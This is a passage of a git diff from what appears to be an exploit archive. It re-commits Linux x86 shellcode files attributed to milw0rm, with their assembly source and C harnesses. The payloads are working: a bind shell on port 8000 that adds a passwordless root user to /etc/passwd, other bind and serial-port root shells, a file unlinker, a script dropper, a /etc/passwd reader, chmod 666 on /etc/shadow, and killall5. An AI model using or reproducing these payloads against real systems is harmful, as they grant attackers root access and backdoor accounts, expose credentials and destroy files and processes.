0x2f3a746f -push 0x6f723a30 -push 0x3a303a3a -push 0x74303072 -mov ecx, esp -push byte 0x1f -pop edx -int 0x80 -;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; -push byte 0x06 -pop eax -int 0x80 -;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; - -push byte 0x01 -pop eax -int 0x80 - +; +; Title : Bindport TCP/8000 & execve add user with access root +; os : Linux x86 +; size : 225+ bytes +; IP : localhost +; Port : 8000 +; Use : nc localhost 8000 +; +; Author : Jonathan Salwan +; Mail : submit AT shell-storm.org +; Web : http://www.shell-storm.org +; +; +; More shellcodes in => http://www.shell-storm.org/shellcode/ +; + +section .text +global _start + +_start: +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x1 +push byte 0x2 + +mov eax, 0x66 +mov ebx, 0x1 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push byte 0x0 +push word 0x401f +push word 0x2 +mov ebx, esp + +push byte 0x10 +push ebx +push edx + +mov eax, 0x66 +mov ebx, 0x2 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; +push byte 0x1 +push edx + +mov eax, 0x66 +mov ebx, 0x4 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push edx + +mov eax, 0x66 +mov ebx, 0x5 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; +mov eax, 0x3f +mov ebx, edx +mov ebx, 0x2 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x1 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; +push byte 0x05 +pop eax +xor ecx, ecx +push ecx +push 0x64777373 +push 
0x61702f2f +push 0x6374652f +mov ebx, esp +mov cx, 02001Q +int 0x80 +;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; + +mov ebx, eax + +;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; +push byte 0x04 +pop eax +xor edx, edx +push edx + +push word 0x6873 +push 0x61622f6e +push 0x69622f3a +push 0x746f6f72 +push 0x2f3a746f +push 0x6f723a30 +push 0x3a303a3a +push 0x74303072 +mov ecx, esp +push byte 0x1f +pop edx +int 0x80 +;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; +push byte 0x06 +pop eax +int 0x80 +;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; + +push byte 0x01 +pop eax +int 0x80 + ; milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13319.s b/platforms/lin_x86/shellcode/13319.s index 65ba0f01b..60f4fd419 100755 --- a/platforms/lin_x86/shellcode/13319.s +++ b/platforms/lin_x86/shellcode/13319.s 
@@ -1,108 +1,108 @@ -; -; Title : Bind asm code Linux x86 - 179 bytes -; IP : 0.0.0.0 -; Port : 8000 -; -; -; Use : nc localhost 8000 -; id -; uid=0(root) gid=0(root) groupes=0(root) -; -; -; Author : Jonathan Salwan -; Mail : submit AT shell-storm.org -; Web : http://www.shell-storm.org -; -; -; More shellcodes in => http://www.shell-storm.org/shellcode/ -; - - -section .data -name db '/bin/sh', 0 -section .text -global _start - -_start: -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x1 -push byte 0x2 - -mov eax, 0x66 -mov ebx, 0x1 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push byte 0x0 -push word 0x401f -push word 0x2 -mov ebx, esp - -push byte 0x10 -push ebx -push edx - -mov eax, 0x66 -mov ebx, 0x2 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; -push byte 0x1 -push edx - -mov eax, 0x66 -mov ebx, 0x4 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push edx - -mov eax, 0x66 -mov ebx, 0x5 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; -mov eax, 0x3f -mov ebx, edx -mov ebx, 0x2 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x1 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; -mov al, 0x0b -mov ebx, name -push byte 0x0 -push name -mov ecx, esp -mov edx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; - +; +; Title : Bind asm code Linux x86 - 179 bytes +; IP : 0.0.0.0 +; Port : 8000 +; +; +; Use : nc localhost 8000 +; id +; uid=0(root) gid=0(root) groupes=0(root) +; +; +; Author : Jonathan Salwan +; Mail : 
submit AT shell-storm.org +; Web : http://www.shell-storm.org +; +; +; More shellcodes in => http://www.shell-storm.org/shellcode/ +; + + +section .data +name db '/bin/sh', 0 +section .text +global _start + +_start: +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x1 +push byte 0x2 + +mov eax, 0x66 +mov ebx, 0x1 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push byte 0x0 +push word 0x401f +push word 0x2 +mov ebx, esp + +push byte 0x10 +push ebx +push edx + +mov eax, 0x66 +mov ebx, 0x2 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; +push byte 0x1 +push edx + +mov eax, 0x66 +mov ebx, 0x4 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push edx + +mov eax, 0x66 +mov ebx, 0x5 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; +mov eax, 0x3f +mov ebx, edx +mov ebx, 0x2 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x1 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; +mov al, 0x0b +mov ebx, name +push byte 0x0 +push name +mov ecx, esp +mov edx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; + ; milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13320.c b/platforms/lin_x86/shellcode/13320.c index 03f7aaf26..035b80e29 100755 --- a/platforms/lin_x86/shellcode/13320.c +++ b/platforms/lin_x86/shellcode/13320.c 
@@ -1,40 +1,40 @@ -/* -setuid(0) + execve(/bin/sh) - just 4 fun. -xi4oyu [at] 80sec.com - -main(){ -__asm( "xorq %rdi,%rdi\n\t" - "mov $0x69,%al\n\t" - "syscall \n\t" - "xorq %rdx, %rdx \n\t" - "movq $0x68732f6e69622fff,%rbx; \n\t" - "shr $0x8, %rbx; \n\t" - "push %rbx; \n\t" - "movq %rsp,%rdi; \n\t" - "xorq %rax,%rax; \n\t" - "pushq %rax; \n\t" - "pushq %rdi; \n\t" - "movq %rsp,%rsi; \n\t" - "mov $0x3b,%al; \n\t" - "syscall ; \n\t" - "pushq $0x1 ; \n\t" - "pop %rdi ; \n\t" - "pushq $0x3c ; \n\t" - "pop %rax ; \n\t" - "syscall ; \n\t" -); -} -*/ -main() { - char shellcode[] = - "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" - "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" - "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" - "\x58\x0f\x05"; - (*(void (*)()) shellcode)(); -} - -2009-05-14 -evil.xi4oyu - +/* +setuid(0) + execve(/bin/sh) - just 4 fun. +xi4oyu [at] 80sec.com + +main(){ +__asm( "xorq %rdi,%rdi\n\t" + "mov $0x69,%al\n\t" + "syscall \n\t" + "xorq %rdx, %rdx \n\t" + "movq $0x68732f6e69622fff,%rbx; \n\t" + "shr $0x8, %rbx; \n\t" + "push %rbx; \n\t" + "movq %rsp,%rdi; \n\t" + "xorq %rax,%rax; \n\t" + "pushq %rax; \n\t" + "pushq %rdi; \n\t" + "movq %rsp,%rsi; \n\t" + "mov $0x3b,%al; \n\t" + "syscall ; \n\t" + "pushq $0x1 ; \n\t" + "pop %rdi ; \n\t" + "pushq $0x3c ; \n\t" + "pop %rax ; \n\t" + "syscall ; \n\t" +); +} +*/ +main() { + char shellcode[] = + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" + "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" + "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" + "\x58\x0f\x05"; + (*(void (*)()) shellcode)(); +} + +2009-05-14 +evil.xi4oyu + // milw0rm.com [2009-05-14] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13321.c b/platforms/lin_x86/shellcode/13321.c index 6816d05dd..5b6d9d09d 100755 --- a/platforms/lin_x86/shellcode/13321.c +++ b/platforms/lin_x86/shellcode/13321.c 
@@ -1,92 +1,92 @@ -/* -General: - Serial port shell binding, busybox launching shellcode.. yey! - -Specific: - *really* wish i could tell you what i needed this for.. but meh.. - - this will bind a busybox sh shell to /dev/ttyS0, the shellcode -does not alter the baudrate settings.. 9600 is the default, but its easy enough to cycle though if were -at a different baud rate. - - -...damn how long has it been since i posted one of these? - -happy hunting - - --phar - @ - stonedcoder -mdavis . - @ org - ioactive - . - com - -main: - 31 d2 xor %edx,%edx - 31 c0 xor %eax,%eax - 6a 02 push $0x2 #flags O_RDW - 59 pop %ecx - 66 b8 53 30 mov $0x3053,%ax - 50 push %eax - 68 2f 74 74 79 push $0x7974742f #port device - 68 2f 64 65 76 push $0x7665642f - 89 e3 mov %esp,%ebx - 6a 05 push $0x5 - 58 pop %eax - 89 c6 mov %eax,%esi - cd 80 int $0x80 #open - 89 c6 mov %eax,%esi - 31 c9 xor %ecx,%ecx - -dup2_loop: #set the serial port as our console - 89 f3 mov %esi,%ebx - 6a 3f push $0x3f - 58 pop %eax - cd 80 int $0x80 #dup2 - 41 inc %ecx - 80 f9 03 cmp $0x3,%cl - 75 f3 jne 80483a7 dup2_loop - 66 b8 73 68 mov $0x6873,%ax - 50 push %eax - 89 e1 mov %esp,%ecx - 52 push %edx - 51 push %ecx - 89 e1 mov %esp,%ecx - 52 push %edx - 68 79 62 6f 78 push $0x786f6279 #/bin/busybox - 68 2f 62 75 73 push $0x7375622f - 68 2f 62 69 6e push $0x6e69622f - 89 e3 mov %esp,%ebx - 6a 0b push $0xb - 58 pop %eax - cd 80 int $0x80 #execve -*/ - - - - - -int main() { -char shellcode[] = { -"\x31\xd2\x31\xc0\x6a\x02\x59\x66\xb8\x53\x30\x50\x68\x2f\x74\x74" -"\x79\x68\x2f\x64\x65\x76\x89\xe3\x6a\x05\x58\x89\xc6\xcd\x80\x89" -"\xc6\x31\xc9\x89\xf3\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf3" -"\x66\xb8\x73\x68\x50\x89\xe1\x52\x51\x89\xe1\x52\x68\x79\x62\x6f" -"\x78\x68\x2f\x62\x75\x73\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58" -"\xcd\x80"}; -char cnull = 0; - - printf("shellcode_size: %u\n", sizeof(shellcode)); - printf("contains nulls: "); - if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ - printf("yes\n"); - 
}else{ - printf("no\n"); - } - (*(void(*)()) shellcode)(); -} - +/* +General: + Serial port shell binding, busybox launching shellcode.. yey! + +Specific: + *really* wish i could tell you what i needed this for.. but meh.. + + this will bind a busybox sh shell to /dev/ttyS0, the shellcode +does not alter the baudrate settings.. 9600 is the default, but its easy enough to cycle though if were +at a different baud rate. + + +...damn how long has it been since i posted one of these? + +happy hunting + + +-phar + @ + stonedcoder +mdavis . + @ org + ioactive + . + com + +main: + 31 d2 xor %edx,%edx + 31 c0 xor %eax,%eax + 6a 02 push $0x2 #flags O_RDW + 59 pop %ecx + 66 b8 53 30 mov $0x3053,%ax + 50 push %eax + 68 2f 74 74 79 push $0x7974742f #port device + 68 2f 64 65 76 push $0x7665642f + 89 e3 mov %esp,%ebx + 6a 05 push $0x5 + 58 pop %eax + 89 c6 mov %eax,%esi + cd 80 int $0x80 #open + 89 c6 mov %eax,%esi + 31 c9 xor %ecx,%ecx + +dup2_loop: #set the serial port as our console + 89 f3 mov %esi,%ebx + 6a 3f push $0x3f + 58 pop %eax + cd 80 int $0x80 #dup2 + 41 inc %ecx + 80 f9 03 cmp $0x3,%cl + 75 f3 jne 80483a7 dup2_loop + 66 b8 73 68 mov $0x6873,%ax + 50 push %eax + 89 e1 mov %esp,%ecx + 52 push %edx + 51 push %ecx + 89 e1 mov %esp,%ecx + 52 push %edx + 68 79 62 6f 78 push $0x786f6279 #/bin/busybox + 68 2f 62 75 73 push $0x7375622f + 68 2f 62 69 6e push $0x6e69622f + 89 e3 mov %esp,%ebx + 6a 0b push $0xb + 58 pop %eax + cd 80 int $0x80 #execve +*/ + + + + + +int main() { +char shellcode[] = { +"\x31\xd2\x31\xc0\x6a\x02\x59\x66\xb8\x53\x30\x50\x68\x2f\x74\x74" +"\x79\x68\x2f\x64\x65\x76\x89\xe3\x6a\x05\x58\x89\xc6\xcd\x80\x89" +"\xc6\x31\xc9\x89\xf3\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf3" +"\x66\xb8\x73\x68\x50\x89\xe1\x52\x51\x89\xe1\x52\x68\x79\x62\x6f" +"\x78\x68\x2f\x62\x75\x73\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58" +"\xcd\x80"}; +char cnull = 0; + + printf("shellcode_size: %u\n", sizeof(shellcode)); + printf("contains nulls: "); + 
if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ + printf("yes\n"); + }else{ + printf("no\n"); + } + (*(void(*)()) shellcode)(); +} + // milw0rm.com [2009-04-30] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13322.c b/platforms/lin_x86/shellcode/13322.c index 4b10b8a60..c00d2cfc6 100755 --- a/platforms/lin_x86/shellcode/13322.c +++ b/platforms/lin_x86/shellcode/13322.c @@ -1,30 +1,30 @@ -/* -Author : darkjoker -Site : http://darkjoker.net23.net -Shellcode : linux/x86 File unlinker 18 bytes + file path length - - .global _start -_start: - jmp one - -two: - pop %ebx - movb $0xa,%al - int $0x80 - - movb $0x1, %al - xor %ebx, %ebx - int $0x80 - -one: - call two - .string "file" -*/ - -char main [] = -"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0" -"\x01\x31\xdb\xcd\x80\xe8\xf0\xff" -"\xff\xff" -"file" //Here file path to delete - +/* +Author : darkjoker +Site : http://darkjoker.net23.net +Shellcode : linux/x86 File unlinker 18 bytes + file path length + + .global _start +_start: + jmp one + +two: + pop %ebx + movb $0xa,%al + int $0x80 + + movb $0x1, %al + xor %ebx, %ebx + int $0x80 + +one: + call two + .string "file" +*/ + +char main [] = +"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0" +"\x01\x31\xdb\xcd\x80\xe8\xf0\xff" +"\xff\xff" +"file" //Here file path to delete + // milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13323.c b/platforms/lin_x86/shellcode/13323.c index efb5b6ac5..d082ab20a 100755 --- a/platforms/lin_x86/shellcode/13323.c +++ b/platforms/lin_x86/shellcode/13323.c 
@@ -1,90 +1,90 @@ -/* -Author : darkjoker -Site : http://darkjoker.net23.net -Shellcode : linux/x86 Perl script execution 99 bytes + script length - - - .global _start - -_start: - xor %eax, %eax - xor %ebx, %ebx - xor %ecx, %ecx - xor %edx, %edx - xor %edi, %edi - xor %esi, %esi - push %eax - push $0x6c702e30 - push $0x30307470 - push $0x69726373 - - mov %esp, %ebx - movb $0x5, %al - movb $0x41, %cl - int $0x80 - jmp one - -two: - - mov %ebx, %esi - mov %eax, %ebx - - pop %edi - - push %edi - - // Begin http://www.int80h.org/strlen/ - xor %ecx, %ecx - xor %eax, %eax - not %ecx - repne scasb - not %ecx - dec %ecx - // End http://www.int80h.org/strlen/ - - pop %edi - mov %ecx, %eax - mov %edi, %ecx - mov %eax, %edx - - movb $0x4, %al - int $0x80 - - movb $0x6, %al - int $0x80 - - mov %esi, %ebx - movb $0xf, %al - movw $0x1fc, %cx - int $0x80 - - movb $0xb, %al - xor %ecx, %ecx - xor %edx, %edx - int $0x80 - - movb $0x1, %al - xor %ebx, %ebx - int $0x80 - -one: - call two - .string "#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n" -*/ -char main [] = -"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" -"\x31\xff\x31\xf6\x50\x68\x30\x2e" -"\x70\x6c\x68\x70\x74\x30\x30\x68" -"\x73\x63\x72\x69\x89\xe3\xb0\x05" -"\xb1\x41\xcd\x80\xeb\x38\x89\xde" -"\x89\xc3\x5f\x57\x31\xc9\x31\xc0" -"\xf7\xd1\xf2\xae\xf7\xd1\x49\x5f" -"\x89\xc8\x89\xf9\x89\xc2\xb0\x04" -"\xcd\x80\xb0\x06\xcd\x80\x89\xf3" -"\xb0\x0f\x66\xb9\xfc\x01\xcd\x80" -"\xb0\x0b\x31\xc9\x31\xd2\xcd\x80" -"\xb0\x01\x31\xdb\xcd\x80\xe8\xc3" -"\xff\xff\xff" -"#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"; // Here script source - +/* +Author : darkjoker +Site : http://darkjoker.net23.net +Shellcode : linux/x86 Perl script execution 99 bytes + script length + + + .global _start + +_start: + xor %eax, %eax + xor %ebx, %ebx + xor %ecx, %ecx + xor %edx, %edx + xor %edi, %edi + xor %esi, %esi + push %eax + push $0x6c702e30 + push $0x30307470 + push $0x69726373 + + mov %esp, %ebx + movb $0x5, %al + movb $0x41, %cl + int $0x80 + jmp one + 
+two: + + mov %ebx, %esi + mov %eax, %ebx + + pop %edi + + push %edi + + // Begin http://www.int80h.org/strlen/ + xor %ecx, %ecx + xor %eax, %eax + not %ecx + repne scasb + not %ecx + dec %ecx + // End http://www.int80h.org/strlen/ + + pop %edi + mov %ecx, %eax + mov %edi, %ecx + mov %eax, %edx + + movb $0x4, %al + int $0x80 + + movb $0x6, %al + int $0x80 + + mov %esi, %ebx + movb $0xf, %al + movw $0x1fc, %cx + int $0x80 + + movb $0xb, %al + xor %ecx, %ecx + xor %edx, %edx + int $0x80 + + movb $0x1, %al + xor %ebx, %ebx + int $0x80 + +one: + call two + .string "#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n" +*/ +char main [] = +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" +"\x31\xff\x31\xf6\x50\x68\x30\x2e" +"\x70\x6c\x68\x70\x74\x30\x30\x68" +"\x73\x63\x72\x69\x89\xe3\xb0\x05" +"\xb1\x41\xcd\x80\xeb\x38\x89\xde" +"\x89\xc3\x5f\x57\x31\xc9\x31\xc0" +"\xf7\xd1\xf2\xae\xf7\xd1\x49\x5f" +"\x89\xc8\x89\xf9\x89\xc2\xb0\x04" +"\xcd\x80\xb0\x06\xcd\x80\x89\xf3" +"\xb0\x0f\x66\xb9\xfc\x01\xcd\x80" +"\xb0\x0b\x31\xc9\x31\xd2\xcd\x80" +"\xb0\x01\x31\xdb\xcd\x80\xe8\xc3" +"\xff\xff\xff" +"#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"; // Here script source + // milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13324.c b/platforms/lin_x86/shellcode/13324.c index 34c28c35a..baf93519f 100755 --- a/platforms/lin_x86/shellcode/13324.c +++ b/platforms/lin_x86/shellcode/13324.c 
@@ -1,66 +1,66 @@ -/* -Linux/x86 file reader. - -65 bytes + pathname -Author: certaindeath - -Source code: -_start: - xor %eax, %eax - xor %ebx, %ebx - xor %ecx, %ecx - xor %edx, %edx - jmp two - -one: - pop %ebx - - movb $5, %al - xor %ecx, %ecx - int $0x80 - - mov %eax, %esi - jmp read - -exit: - movb $1, %al - xor %ebx, %ebx - int $0x80 - -read: - mov %esi, %ebx - movb $3, %al - sub $1, %esp - lea (%esp), %ecx - movb $1, %dl - int $0x80 - - xor %ebx, %ebx - cmp %eax, %ebx - je exit - - movb $4, %al - movb $1, %bl - movb $1, %dl - int $0x80 - - add $1, %esp - jmp read - -two: - call one - .string "file_name" -*/ -char main[]= -"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" -"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd" -"\x80\x89\xc6\xeb\x06\xb0\x01\x31" -"\xdb\xcd\x80\x89\xf3\xb0\x03\x83" -"\xec\x01\x8d\x0c\x24\xb2\x01\xcd" -"\x80\x31\xdb\x39\xc3\x74\xe6\xb0" -"\x04\xb3\x01\xb2\x01\xcd\x80\x83" -"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff" -"\xff" -"/etc/passwd"; //Put here the file path, default is /etc/passwd - +/* +Linux/x86 file reader. 
+ +65 bytes + pathname +Author: certaindeath + +Source code: +_start: + xor %eax, %eax + xor %ebx, %ebx + xor %ecx, %ecx + xor %edx, %edx + jmp two + +one: + pop %ebx + + movb $5, %al + xor %ecx, %ecx + int $0x80 + + mov %eax, %esi + jmp read + +exit: + movb $1, %al + xor %ebx, %ebx + int $0x80 + +read: + mov %esi, %ebx + movb $3, %al + sub $1, %esp + lea (%esp), %ecx + movb $1, %dl + int $0x80 + + xor %ebx, %ebx + cmp %eax, %ebx + je exit + + movb $4, %al + movb $1, %bl + movb $1, %dl + int $0x80 + + add $1, %esp + jmp read + +two: + call one + .string "file_name" +*/ +char main[]= +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" +"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd" +"\x80\x89\xc6\xeb\x06\xb0\x01\x31" +"\xdb\xcd\x80\x89\xf3\xb0\x03\x83" +"\xec\x01\x8d\x0c\x24\xb2\x01\xcd" +"\x80\x31\xdb\x39\xc3\x74\xe6\xb0" +"\x04\xb3\x01\xb2\x01\xcd\x80\x83" +"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff" +"\xff" +"/etc/passwd"; //Put here the file path, default is /etc/passwd + // milw0rm.com [2009-02-27] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13325.c b/platforms/lin_x86/shellcode/13325.c index 7dbd4c942..4b7afb335 100755 --- a/platforms/lin_x86/shellcode/13325.c +++ b/platforms/lin_x86/shellcode/13325.c 
@@ -1,55 +1,55 @@ -/* - Linux/x86 - chmod("/etc/shadow",666) & exit(0) - - Info reg - ------------------ - %eax = 15 - %ebx = /etc/shadow - %ecx = 666 - - %eax = 1 - %ebx = 0 - - Shellcode 30 bytes - Author: Jonathan Salwan < submit [AT] shell-storm.org > - Web: http://www.shell-storm.org - - Disassembly of section .text: - - 08048054 <.text>: - 8048054: 51 push %ecx - 8048055: 66 b9 b6 01 mov $0x1b6,%cx - 8048059: 68 61 64 6f 77 push $0x776f6461 - 804805e: 68 63 2f 73 68 push $0x68732f63 - 8048063: 68 2f 2f 65 74 push $0x74652f2f - 8048068: 89 e3 mov %esp,%ebx - 804806a: 6a 0f push $0xf - 804806c: 58 pop %eax - 804806d: cd 80 int $0x80 - 804806f: 40 inc %eax - 8048070: cd 80 int $0x80 - -*/ - -#include "stdio.h" - -int main(int argc, char *argv[]) -{ - - char shellcode[] = "\x51\x66\xb9\xb6" - "\x01\x68\x61\x64" - "\x6f\x77\x68\x63" // chmod("/etc/shadow",666) - "\x2f\x73\x68\x68" - "\x2f\x2f\x65\x74" - "\x89\xe3\x6a\x0f" - "\x58\xcd\x80" - - "\x40\xcd\x80"; // exit(0); - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + Linux/x86 - chmod("/etc/shadow",666) & exit(0) + + Info reg + ------------------ + %eax = 15 + %ebx = /etc/shadow + %ecx = 666 + + %eax = 1 + %ebx = 0 + + Shellcode 30 bytes + Author: Jonathan Salwan < submit [AT] shell-storm.org > + Web: http://www.shell-storm.org + + Disassembly of section .text: + + 08048054 <.text>: + 8048054: 51 push %ecx + 8048055: 66 b9 b6 01 mov $0x1b6,%cx + 8048059: 68 61 64 6f 77 push $0x776f6461 + 804805e: 68 63 2f 73 68 push $0x68732f63 + 8048063: 68 2f 2f 65 74 push $0x74652f2f + 8048068: 89 e3 mov %esp,%ebx + 804806a: 6a 0f push $0xf + 804806c: 58 pop %eax + 804806d: cd 80 int $0x80 + 804806f: 40 inc %eax + 8048070: cd 80 int $0x80 + +*/ + +#include "stdio.h" + +int main(int argc, char *argv[]) +{ + + char shellcode[] = "\x51\x66\xb9\xb6" + "\x01\x68\x61\x64" + "\x6f\x77\x68\x63" // chmod("/etc/shadow",666) + "\x2f\x73\x68\x68" + "\x2f\x2f\x65\x74" + "\x89\xe3\x6a\x0f" 
+ "\x58\xcd\x80" + + "\x40\xcd\x80"; // exit(0); + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-02-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13326.c b/platforms/lin_x86/shellcode/13326.c index 06861d497..cceb8a068 100755 --- a/platforms/lin_x86/shellcode/13326.c +++ b/platforms/lin_x86/shellcode/13326.c 
@@ -1,50 +1,50 @@ -/* - Linux x86 | killall5 - Shellcode 34 bytes - Author: Jonathan Salwan : - 8048054: 31 c0 xor %eax,%eax - 8048056: 50 push %eax - 8048057: 66 68 6c 35 pushw $0x356c - 804805b: 68 6c 6c 61 6c push $0x6c616c6c - 8048060: 68 6e 2f 6b 69 push $0x696b2f6e - 8048065: 68 2f 73 62 69 push $0x6962732f - 804806a: 89 e3 mov %esp,%ebx - 804806c: 50 push %eax - 804806d: 89 e2 mov %esp,%edx - 804806f: 53 push %ebx - 8048070: 89 e1 mov %esp,%ecx - 8048072: b0 0b mov $0xb,%al - 8048074: cd 80 int $0x80 - -*/ - -#include "stdio.h" - -int main(int argc, char *argv[]) -{ - - char shellcode[] = "\x31\xc0\x50\x66\x68\x6c" - "\x35\x68\x6c\x6c\x61\x6c" - "\x68\x6e\x2f\x6b\x69\x68" - "\x2f\x73\x62\x69\x89\xe3" - "\x50\x89\xe2\x53\x89\xe1" - "\xb0\x0b\xcd\x80"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + Linux x86 | killall5 + Shellcode 34 bytes + Author: Jonathan Salwan : + 8048054: 31 c0 xor %eax,%eax + 8048056: 50 push %eax + 8048057: 66 68 6c 35 pushw $0x356c + 804805b: 68 6c 6c 61 6c push $0x6c616c6c + 8048060: 68 6e 2f 6b 69 push $0x696b2f6e + 8048065: 68 2f 73 62 69 push $0x6962732f + 804806a: 89 e3 mov %esp,%ebx + 804806c: 50 push %eax + 804806d: 89 e2 mov 